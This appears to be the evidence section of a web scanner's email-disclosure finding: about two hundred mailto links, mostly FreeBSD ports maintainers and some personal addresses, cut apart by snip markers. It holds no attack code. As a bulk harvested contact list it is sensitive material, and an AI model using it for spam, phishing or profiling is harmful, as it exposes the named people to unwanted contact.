<A HREF="mailto:info@otsune.com">info@otsune.com</A>
...[SNIP]...
<A HREF="mailto:naddy@FreeBSD.org">naddy@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:yasu@utahime.org">yasu@utahime.org</A>
...[SNIP]...
<A HREF="mailto:yasu@utahime.org">yasu@utahime.org</A>
...[SNIP]...
<A HREF="mailto:anders@FreeBSD.org">anders@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:johans@FreeBSD.org">johans@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:bsd@dino.sk">bsd@dino.sk</A>
...[SNIP]...
<A HREF="mailto:sahil@FreeBSD.org">sahil@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:netchild@FreeBSD.org">netchild@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:miwi@FreeBSD.org">miwi@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:c0rn@o2.pl">c0rn@o2.pl</A>
...[SNIP]...
<A HREF="mailto:c0rn@o2.pl">c0rn@o2.pl</A>
...[SNIP]...
<A HREF="mailto:miwi@FreeBSD.org">miwi@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:c0rn@o2.pl">c0rn@o2.pl</A>
...[SNIP]...
<A HREF="mailto:c0rn@o2.pl">c0rn@o2.pl</A>
...[SNIP]...
<A HREF="mailto:c0rn@o2.pl">c0rn@o2.pl</A>
...[SNIP]...
<A HREF="mailto:c0rn@o2.pl">c0rn@o2.pl</A>
...[SNIP]...
<A HREF="mailto:c0rn@o2.pl">c0rn@o2.pl</A>
...[SNIP]...
<A HREF="mailto:c0rn@o2.pl">c0rn@o2.pl</A>
...[SNIP]...
<A HREF="mailto:c0rn@o2.pl">c0rn@o2.pl</A>
...[SNIP]...
<A HREF="mailto:c0rn@o2.pl">c0rn@o2.pl</A>
...[SNIP]...
<A HREF="mailto:miwi@FreeBSD.org">miwi@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:c0rn@o2.pl">c0rn@o2.pl</A>
...[SNIP]...
<A HREF="mailto:miwi@FreeBSD.org">miwi@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:c0rn@o2.pl">c0rn@o2.pl</A>
...[SNIP]...
<A HREF="mailto:miwi@FreeBSD.org">miwi@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:miwi@FreeBSD.org">miwi@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:c0rn@o2.pl">c0rn@o2.pl</A>
...[SNIP]...
<A HREF="mailto:c0rn@o2.pl">c0rn@o2.pl</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ler@lerctr.org">ler@lerctr.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:udo.schweigert@siemens.com">udo.schweigert@siemens.com</A>
...[SNIP]...
<A HREF="mailto:bsd@dino.sk">bsd@dino.sk</A>
...[SNIP]...
<A HREF="mailto:oliver@FreeBSD.org">oliver@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:oliver@FreeBSD.org">oliver@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:oliver@FreeBSD.org">oliver@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:oliver@FreeBSD.org">oliver@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:oliver@FreeBSD.org">oliver@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:oliver@FreeBSD.org">oliver@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:oliver@FreeBSD.org">oliver@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:oliver@FreeBSD.org">oliver@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:oliver@FreeBSD.org">oliver@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:bsd@dino.sk">bsd@dino.sk</A>
...[SNIP]...
<A HREF="mailto:kiwi@oav.net">kiwi@oav.net</A>
...[SNIP]...
<A HREF="mailto:andrew@arda.homeunix.net">andrew@arda.homeunix.net</A>
...[SNIP]...
<A HREF="mailto:andrew@arda.homeunix.net">andrew@arda.homeunix.net</A>
...[SNIP]...
<A HREF="mailto:andrew@arda.homeunix.net">andrew@arda.homeunix.net</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:vk@vk.pp.ru">vk@vk.pp.ru</A>
...[SNIP]...
<A HREF="mailto:chalpin@cs.wisc.edu">chalpin@cs.wisc.edu</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ume@FreeBSD.org">ume@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ume@FreeBSD.org">ume@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ume@FreeBSD.org">ume@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ume@FreeBSD.org">ume@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ehaupt@FreeBSD.org">ehaupt@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:john.c.prather@gmail.com">john.c.prather@gmail.com</A>
...[SNIP]...
<A HREF="mailto:mark_sf@kikg.ifmo.ru">mark_sf@kikg.ifmo.ru</A>
...[SNIP]...
<A HREF="mailto:mark_sf@kikg.ifmo.ru">mark_sf@kikg.ifmo.ru</A>
...[SNIP]...
<A HREF="mailto:mark_sf@kikg.ifmo.ru">mark_sf@kikg.ifmo.ru</A>
...[SNIP]...
<A HREF="mailto:mark_sf@kikg.ifmo.ru">mark_sf@kikg.ifmo.ru</A>
...[SNIP]...
<A HREF="mailto:cgreen@sentex.net">cgreen@sentex.net</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ehaupt@FreeBSD.org">ehaupt@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gjb@FreeBSD.org">gjb@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:yanagisawa@csg.is.titech.ac.jp">yanagisawa@csg.is.titech.ac.jp</A>
...[SNIP]...
<A HREF="mailto:umq@ueo.co.jp">umq@ueo.co.jp</A>
...[SNIP]...
<A HREF="mailto:yanagisawa@csg.is.titech.ac.jp">yanagisawa@csg.is.titech.ac.jp</A>
...[SNIP]...
<A HREF="mailto:bapt@FreeBSD.org">bapt@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:yds@CoolRat.org">yds@CoolRat.org</A>
...[SNIP]...
<A HREF="mailto:bra@fsn.hu">bra@fsn.hu</A>
...[SNIP]...
<A HREF="mailto:dsh@wizard.volgograd.ru">dsh@wizard.volgograd.ru</A>
...[SNIP]...
<A HREF="mailto:dgeo@ec-marseille.fr">dgeo@ec-marseille.fr</A>
...[SNIP]...
<A HREF="mailto:bra@fsn.hu">bra@fsn.hu</A>
...[SNIP]...
<A HREF="mailto:yds@CoolRat.org">yds@CoolRat.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:support@spectrum.ru">support@spectrum.ru</A>
...[SNIP]...
<A HREF="mailto:support@spectrum.ru">support@spectrum.ru</A>
...[SNIP]...
<A HREF="mailto:support@spectrum.ru">support@spectrum.ru</A>
...[SNIP]...
<A HREF="mailto:dean@odyssey.apana.org.au">dean@odyssey.apana.org.au</A>
...[SNIP]...
<A HREF="mailto:itetcu@FreeBSD.org">itetcu@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:itetcu@FreeBSD.org">itetcu@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:jtrigg@spamcop.net">jtrigg@spamcop.net</A>
...[SNIP]...
<A HREF="mailto:johans@FreeBSD.org">johans@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:toasty@dragondata.com">toasty@dragondata.com</A>
...[SNIP]...
<A HREF="mailto:dhn@FreeBSD.org">dhn@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dhn@FreeBSD.org">dhn@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:johans@FreeBSD.org">johans@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:umq@ueo.co.jp">umq@ueo.co.jp</A>
...[SNIP]...
<A HREF="mailto:ismail@EnderUNIX.org">ismail@EnderUNIX.org</A>
...[SNIP]...
<A HREF="mailto:ismail@EnderUNIX.org">ismail@EnderUNIX.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:bsd-sharp@googlegroups.com">bsd-sharp@googlegroups.com</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ler@lerctr.org">ler@lerctr.org</A>
...[SNIP]...
<A HREF="mailto:krion@FreeBSD.org">krion@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:krion@FreeBSD.org">krion@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:krion@FreeBSD.org">krion@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:krion@FreeBSD.org">krion@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:krion@FreeBSD.org">krion@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:krion@FreeBSD.org">krion@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:krion@FreeBSD.org">krion@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:araujo@FreeBSD.org">araujo@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:chifeng@gmail.com">chifeng@gmail.com</A>
...[SNIP]...
<A HREF="mailto:chifeng@gmail.com">chifeng@gmail.com</A>
...[SNIP]...
<A HREF="mailto:gahr@FreeBSD.org">gahr@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:glarkin@FreeBSD.org">glarkin@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:hans@nordhaug.priv.no">hans@nordhaug.priv.no</A>
...[SNIP]...
<A HREF="mailto:ashish@FreeBSD.org">ashish@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:chifeng@gmail.com">chifeng@gmail.com</A>
...[SNIP]...
<A HREF="mailto:chalpin@cs.wisc.edu">chalpin@cs.wisc.edu</A>
...[SNIP]...
<A HREF="mailto:chalpin@cs.wisc.edu">chalpin@cs.wisc.edu</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:sylvio@FreeBSD.org">sylvio@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dean@odyssey.apana.org.au">dean@odyssey.apana.org.au</A>
...[SNIP]...
<A HREF="mailto:dean@odyssey.apana.org.au">dean@odyssey.apana.org.au</A>
...[SNIP]...
<A HREF="mailto:avg@icyb.net.ua">avg@icyb.net.ua</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:forsite@spamtest.ru">forsite@spamtest.ru</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:arensb+freebsd-ports@ooblick.com">arensb+freebsd-ports@ooblick.com</A>
...[SNIP]...
<A HREF="mailto:ayu@commun.jp">ayu@commun.jp</A>
...[SNIP]...
<A HREF="mailto:question+fbsdports@closedsrc.org">question+fbsdports@closedsrc.org</A>
...[SNIP]...
<A HREF="mailto:treif@mayn.de">treif@mayn.de</A>
...[SNIP]...
<A HREF="mailto:fernan@iib.unsam.edu.ar">fernan@iib.unsam.edu.ar</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:sahil@FreeBSD.org">sahil@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gahr@FreeBSD.org">gahr@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mnag@FreeBSD.org">mnag@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mnag@FreeBSD.org">mnag@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mono@FreeBSD.org">mono@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mono@FreeBSD.org">mono@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:avl@FreeBSD.org">avl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:avl@FreeBSD.org">avl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:tdb@FreeBSD.org">tdb@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:fjoe@FreeBSD.org">fjoe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:araujo@FreeBSD.org">araujo@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mij@bitchx.it">mij@bitchx.it</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mich@FreeBSD.org">mich@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:chalpin@cs.wisc.edu">chalpin@cs.wisc.edu</A>
...[SNIP]...
<A HREF="mailto:obrien@FreeBSD.org">obrien@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:avl@FreeBSD.org">avl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:beech@FreeBSD.org">beech@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:beech@FreeBSD.org">beech@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:beech@FreeBSD.org">beech@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:beech@FreeBSD.org">beech@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:beech@FreeBSD.org">beech@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:beech@FreeBSD.org">beech@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:beech@FreeBSD.org">beech@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:beech@FreeBSD.org">beech@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:john@jnielsen.net">john@jnielsen.net</A>
...[SNIP]...
<A HREF="mailto:haskell@FreeBSD.org">haskell@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:fjoe@FreeBSD.org">fjoe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:os@rsu.ru">os@rsu.ru</A>
...[SNIP]...
<A HREF="mailto:fjoe@FreeBSD.org">fjoe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:fjoe@FreeBSD.org">fjoe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:os@rsu.ru">os@rsu.ru</A>
...[SNIP]...
<A HREF="mailto:fjoe@FreeBSD.org">fjoe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:os@rsu.ru">os@rsu.ru</A>
...[SNIP]...
<A HREF="mailto:fjoe@FreeBSD.org">fjoe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:fjoe@FreeBSD.org">fjoe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:fjoe@FreeBSD.org">fjoe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:fjoe@FreeBSD.org">fjoe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mail@ozzmosis.com">mail@ozzmosis.com</A>
...[SNIP]...
<A HREF="mailto:fjoe@FreeBSD.org">fjoe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:fjoe@FreeBSD.org">fjoe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:fjoe@FreeBSD.org">fjoe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:os@rsu.ru">os@rsu.ru</A>
...[SNIP]...
<A HREF="mailto:fjoe@FreeBSD.org">fjoe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dan@langille.org">dan@langille.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:tota@FreeBSD.org">tota@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:craig001@lerwick.hopto.org">craig001@lerwick.hopto.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:anders@FreeBSD.org">anders@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stefan@FreeBSD.org">stefan@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@christianserving.org">ports@christianserving.org</A>
...[SNIP]...
<A HREF="mailto:bsam@FreeBSD.org">bsam@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:decke@FreeBSD.org">decke@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ehaupt@FreeBSD.org">ehaupt@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:koj@ofug.net">koj@ofug.net</A>
...[SNIP]...
<A HREF="mailto:motoyuki@freebsd.org">motoyuki@freebsd.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:nork@FreeBSD.org">nork@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:st@be.to">st@be.to</A>
...[SNIP]...
<A HREF="mailto:st@be.to">st@be.to</A>
...[SNIP]...
<A HREF="mailto:fmysh@iijmio-mail.jp">fmysh@iijmio-mail.jp</A>
...[SNIP]...
<A HREF="mailto:nork@FreeBSD.org">nork@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:nork@FreeBSD.org">nork@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:nork@FreeBSD.org">nork@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:toha@toha.org.ua">toha@toha.org.ua</A>
...[SNIP]...
<A HREF="mailto:romain@FreeBSD.org">romain@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gsutter@zer0.org">gsutter@zer0.org</A>
...[SNIP]...
<A HREF="mailto:citycat4@ngs.ru">citycat4@ngs.ru</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:yuanjue@FreeBSD.org">yuanjue@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:alexey@renatasystems.org">alexey@renatasystems.org</A>
...[SNIP]...
<A HREF="mailto:tota@FreeBSD.org">tota@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:itetcu@FreeBSD.org">itetcu@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:skv@FreeBSD.org">skv@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:skv@FreeBSD.org">skv@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mnag@FreeBSD.org">mnag@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:c0rn@o2.pl">c0rn@o2.pl</A>
...[SNIP]...
<A HREF="mailto:kwm@FreeBSD.org">kwm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:chifeng@gmail.com">chifeng@gmail.com</A>
...[SNIP]...
<A HREF="mailto:ismail@EnderUNIX.org">ismail@EnderUNIX.org</A>
...[SNIP]...
<A HREF="mailto:mark_sf@kikg.ifmo.ru">mark_sf@kikg.ifmo.ru</A>
...[SNIP]...
<A HREF="mailto:alexey@renatasystems.org">alexey@renatasystems.org</A>
...[SNIP]...
<A HREF="mailto:mnag@FreeBSD.org">mnag@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mnag@FreeBSD.org">mnag@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mnag@FreeBSD.org">mnag@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:simond@irrelevant.org">simond@irrelevant.org</A>
...[SNIP]...
<A HREF="mailto:delphij@FreeBSD.org">delphij@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:delphus@gmail.com">delphus@gmail.com</A>
...[SNIP]...
<A HREF="mailto:gecko@FreeBSD.org">gecko@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:christer.edwards@gmail.com">christer.edwards@gmail.com</A>
...[SNIP]...
<A HREF="mailto:gshapiro@FreeBSD.org">gshapiro@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:vd@FreeBSD.org">vd@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kiwi@oav.net">kiwi@oav.net</A>
...[SNIP]...
<A HREF="mailto:janos.mohacsi@bsd.hu">janos.mohacsi@bsd.hu</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mwisnicki+freebsd@gmail.com">mwisnicki+freebsd@gmail.com</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:g.gonter@ieee.org">g.gonter@ieee.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:garga@FreeBSD.org">garga@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:tundra@tundraware.com">tundra@tundraware.com</A>
...[SNIP]...
<A HREF="mailto:tarkhil@over.ru">tarkhil@over.ru</A>
...[SNIP]...
<A HREF="mailto:rafan@FreeBSD.org">rafan@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:wxs@FreeBSD.org">wxs@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:sexbear@tmu.edu.tw">sexbear@tmu.edu.tw</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:jjuanino@gmail.com">jjuanino@gmail.com</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:anders@FreeBSD.org">anders@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:edwin@mavetju.org">edwin@mavetju.org</A>
...[SNIP]...
<A HREF="mailto:garga@FreeBSD.org">garga@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gahr@FreeBSD.org">gahr@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:pav@FreeBSD.org">pav@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:anders@FreeBSD.org">anders@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:clsung@FreeBSD.org">clsung@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:avl@FreeBSD.org">avl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:drs@rucus.ru.ac.za">drs@rucus.ru.ac.za</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:jf@dockes.org">jf@dockes.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:hiroto.kagotani@gmail.com">hiroto.kagotani@gmail.com</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:victor@bsdes.net">victor@bsdes.net</A>
...[SNIP]...
<A HREF="mailto:ehaupt@FreeBSD.org">ehaupt@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ache@FreeBSD.org">ache@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ache@FreeBSD.org">ache@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:umq@ueo.co.jp">umq@ueo.co.jp</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:alexey@renatasystems.org">alexey@renatasystems.org</A>
...[SNIP]...
<A HREF="mailto:ale@FreeBSD.org">ale@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:wes@FreeBSD.org">wes@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:demon@FreeBSD.org">demon@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gmarco@gufi.org">gmarco@gufi.org</A>
...[SNIP]...
<A HREF="mailto:delphij@FreeBSD.org">delphij@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:wolf@priori.net">wolf@priori.net</A>
...[SNIP]...
<A HREF="mailto:mjl@luckie.org.nz">mjl@luckie.org.nz</A>
...[SNIP]...
<A HREF="mailto:xi@borderworlds.dk">xi@borderworlds.dk</A>
...[SNIP]...
<A HREF="mailto:anarcat@anarcat.ath.cx">anarcat@anarcat.ath.cx</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:wosch@FreeBSD.org">wosch@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:thierry@FreeBSD.org">thierry@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ale@FreeBSD.org">ale@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:sylvio@FreeBSD.org">sylvio@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ismail@EnderUNIX.org">ismail@EnderUNIX.org</A>
...[SNIP]...
